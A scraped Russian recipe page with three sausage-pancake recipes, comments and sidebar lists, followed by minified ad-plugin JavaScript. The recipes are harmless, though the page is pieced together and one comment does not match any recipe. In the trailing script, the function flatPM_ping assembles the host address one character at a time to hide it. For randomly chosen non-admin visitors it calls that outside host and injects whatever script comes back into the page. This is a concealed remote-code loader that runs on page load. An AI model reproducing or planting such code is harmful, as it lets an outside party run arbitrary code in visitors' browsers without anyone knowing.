Оладьи с колбасой

Оладьи с колбасой на кефире

Ингредиенты

Яйцо куриное – 1 шт.

Колбаса вареная – 150 г

Масло для жарки – 3 ст.л.

Мука пшеничная – 5 ст.л.

  • 216 кКал
  • 15 мин.
  • 15 мин.
  • 30 мин.

Фото готового блюда

Пошаговый рецепт с фото

В нашей семье пользуются популярностью всевозможные блинчики и оладушки, поэтому иной раз приходится импровизировать, чтобы приятно удивить своих близких, ну и попробовать что-то новенькое. Оладьи с колбасой на кефире оказались более чем удачным экспериментом, они понравились и детям, и взрослым. А лично для меня приятным бонусом была простота их приготовления.

Подготовьте заранее все ингредиенты. Яйцо и кефир можно достать из холодильника, чтобы они “дошли” до комнатной температуры, однако это не принципиально.

Самую вкусную вареную колбасу очистите от оболочки и нарежьте кубиками. Можно даже натереть колбасу на крупной терке.

В большую миску налейте кефир и туда же вбейте крупное куриное яйцо. Если яйцо небольшое, то можно использовать пару штук.

Теперь можно подсыпать пшеничную муку, предварительно просеянную через сито.

Отправьте в миску нарезанную маленькими кусочками колбасу. Иной раз можно взять и ветчину, однако колбаса не должна быть сухой.

Добавьте сахар, соль, специи, соду. Оладьи не должны быть сладкими, но и пресными их делать тоже не стоит.

Хорошенько все перемешайте и дайте тесту постоять минут 20, можно отправить миску в холодильник.

Смажьте сковороду растительным маслом и поставьте ее на слабый огонь. Через минуту можно начинать выкладывать порции теста небольшой ложкой. Жарьте по 2-3 минуты с одной стороны.

Аккуратно переверните оладьи на другую сторону и жарьте еще минуты 2-3.

Снимите оладьи со сковороды и сразу же подавайте, пока горячие.

Оладьи с колбасой на кефире здорово сочетаются со сметаной и несладкими соусами. Приятного аппетита!

Оладьи с колбасой и зеленью на кефире

Описание блюда.

Здравствуйте, дорогие посетители, добро пожаловать на мой сайт!

Нередко я радую себя и своих близких чем-нибудь вкусненьким. Вот и сегодня как раз такой день, когда мне захотелось приготовить что-то этакое — не совсем обычное, в тоже время, не требующее больших усилий и быстрое в исполнении блюдо. Палочкой-выручалочкой оказались оладьи. Но как можно разнообразить это до невозможности простое кулинарное изделие? Данный вопрос — абсолютно логичен. И на него есть изящный ответ — я предлагаю добавить в тесто зелень и вареную колбасу.

Благодаря этим ингредиентам, а ведь это всего пара небольших деталей, Вы очень сильно измените привычные гастрономические свойства полюбившихся многим оладий. В итоге получится блюдо обладающее приятным ароматом, эстетичное на вид и потрясающее своими отличными вкусовыми качествами.

Очень важным в данном случае является подбор продуктов. Советую не экономить на колбасе — некачественный ингредиент может пустить прахом все усилия, приложенные в процессе приготовления. Укроп и перьевой лук лучше брать свежие, чтобы они передали блюду как можно больше полезных веществ.

Прошу также обратить внимание, что оладьи с колбасой и зеленью являются калорийным продуктом питания. Есть их советую в первой половине дня.

Итак, предлагаю выставить в одно место все необходимое для нашего кулинарного творчества и приступать к рецепту…

Пищевая ценность блюда на 100 гр.

Время приготовления: 20-25 мин.

Количество порций: 4 порции (850 г) .

Ингредиенты блюда.

  • Кефир — 250 мл (1 ст).
  • Мука пшеничная высшего сорта — 230 г (1,5 ст).
  • Яйцо 1 С — 1 шт.
  • Вода — 120 мл (1/2 ст).
  • Сода — 3 г (щепотка).
  • Соль — 7-8 г (1 ч.л).
  • Масло растительное — 30 мл (1-2 ст.л+1 ч.л для смазки сковороды).
  • Зелень (укроп, лук перьевой) — 25 г.
  • Колбаса вареная Докторская — 150 г.

Рецепт блюда.

Подготовим ингредиенты. Зелень и яйцо моем под проточной водой. Пшеничную муку просеиваем, обогащая кислородом. С колбасы снимаем пленку.

Кефир можно использовать любой жирности, чем она больше, тем калорийнее будет итоговое блюдо.

В глубокую миску помещаем все ингредиенты теста: пшеничную муку (1,5 ст), яйцо (1 шт), кефир (1 ст), воду (1/2 ст), соль (1 ч.л), щепотку соды и растительное масло (1-2 ст.л).

Перемешиваем содержимое посуды до однородного состояния, консистенции жидкой сметаны.

Перьевой лук и укроп мелко рубим.

Добавляем зелень (30 г) в тесто, перемешиваем.

Колбасу нарезаем мелким кубиком, чем мельче, тем лучше.

Далее соединяем мясной продукт с содержимым миски.

Тщательно вымешиваем тесто. Оно должно быть однородной консистенции, без мучных комочков.

На раскаленную сковороду выкладываем тесто, по 1 ст.л на оладушек и жарим около 2 мин на среднем огне. Если Вы не уверены в антипригарных свойствах поверхности, ее можно слегка смазать подсолнечным маслом.

Переворачиваем оладьи и обжариваем с другой стороны также в течение 1-2 мин.

Готовое блюдо перекладываем на тарелку и подаем с овощами, зеленью и сметаной.

Оладьи по этому рецепту получаются очень воздушными, мягкими и сочными. Они станут прекрасным дополнением к обеду или же займут свое почетное место за завтраком.

Оладьи с колбасой

Это невероятно вкусно, спасибо вам за рецепт! Заменила свежие помидоры на соленые, но все получилось. Очень нежные внутри, сочные, уже жду ими семью вечером угостить

Настя, благодарю за комментарий! На самом деле, с этим рецептом огромное поле для импровизации. Заменяйте начинку — получайте новый вкус!

Оставьте свое мнение Отменить ответ

Посетители

Вконтакте

Свежие комментарии

  • Mara к записи Творожные булочки с корицей
  • Леся к записи Тонкие блины на кефире с дырочками
  • Ирина́ к записи Нежный салат из моркови с яйцом и сыром
  • Elena к записи Хрустящее куриное филе в кляре на сковороде
  • Ирина к записи Простой и быстрый слоеный луковый пирог

Самые рейтинговые рецепты

  • Самый вкусный салат с кальмарами (5,00 из 5)
  • Нежный и вкусный салат «Мимоза» с горбушей (5,00 из 5)
  • Самый вкусный новогодний салат Оливье с курицей (5,00 из 5)
  • Необычная закуска – спринг-роллы с курицей (5,00 из 5)
  • Сочная свинина, запеченная в духовке с горчицей (5,00 из 5)
  • Вкусный лаваш с яйцом и сыром на сковороде (5,00 из 5)
  • Вкусный рулет из лаваша с рыбой и творожным сыром — супер закуска для праздничного стола (5,00 из 5)
  • Праздничный салат из курицы со свеклой, черносливом и орехами (5,00 из 5)

Copyright © 2008 – 2017 Кулинарные рецепты повседневных и праздничных блюд. Любая перепечатка и использование материалов разрешается только с согласия автора.

Оладьи с колбасой и сыром

Простой рецепт авторской кухни. Его можно приготовить за 30 мин. И получится у нас примерно пятнадцать порций. Готовое блюдо содержит примерно 206 кКал. Повод приготовления этого рецепта: завтрак, обед, перекус, ужин.

Оладьи с колбасой и сыром – это быстрое и очень аппетитное блюдо, не требующее ни много времени на готовку, ни особых навыков в кулинарном мастерстве, и даже список продуктов в этом рецепте простейший.

Данное блюдо готовится на основе яиц, а в качестве начинки берем сыр и любую колбаску. Колбасу можно заменить на курицу или сосиски. Ну, а чем ярче вкус будет у сыра, тем вкуснее получатся оладьи.

Такое блюдо можно приготовить как в виде маленьких оладушек, так и в виде омлета.

Любителям простых соленых оладий советую обратить внимание еще и на эти рецепты:

капустные оладьи;оладьи из картофельного пюре;морковные оладьи.

Видео рецепт

Рецепт оладий с колбасой и сыром

  • Время подготовки: 5 мин
  • Общее время: 30 мин
  • Рецепт на: 15 порций
  • Калорий: 206 кКалл
  • Сложность: Простой рецепт
  • Национальная кухня: Авторская
  • Повод: Завтрак, Обед, Перекус, Ужин

Ингредиенты

  • Колбаса 200 г
  • Твердый сыр 200 г
  • Куриные яйца 5 шт.
  • Майонез 2 ст.л.
  • Соль 0,5 ч.л.
  • Специи 1 ч.л.
  • Зеленый лук 1 веточка

Как приготовить

Колбасу нужно нарезать некрупными кусочками. Вкуснее всего получается с копченной колбасой или охотничьими колбасками.

Сыр натереть на мелкой терке.

Нашинковать зеленый лук. Зелень может быть любая. Вместо лука можно использовать укроп или петрушку.

Яйца разбить в большую миску. К яйцам добавить колбасу, сыр, зелень, соль и специи. Все размешать вилкой.

Должно получиться не слишком густое тесто. Возможно, понадобится чуть больше яиц чем указано в рецепте.

Столовой ложкой выложить тесто на разогретую сковородку и накрыть крышкой. Готовить на небольшом огне.

Обжарить оладьи с двух сторон до коричневой корочки.

Готовые оладьи можно подавать как в горячем, так и в холодном виде.

Такие оладьи хорошо гармонируют с огромным количеством соусов. Даже обычный кетчуп или майонез отлично дополнят это блюдо. Но если вы хотите сделать блюдо еще более вкусным и оригинальным, то приготовьте чесночный соус из майонеза или сметанно-томатный соус с луком. Помимо соуса блюдо можно дополнить легким овощным салатом.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};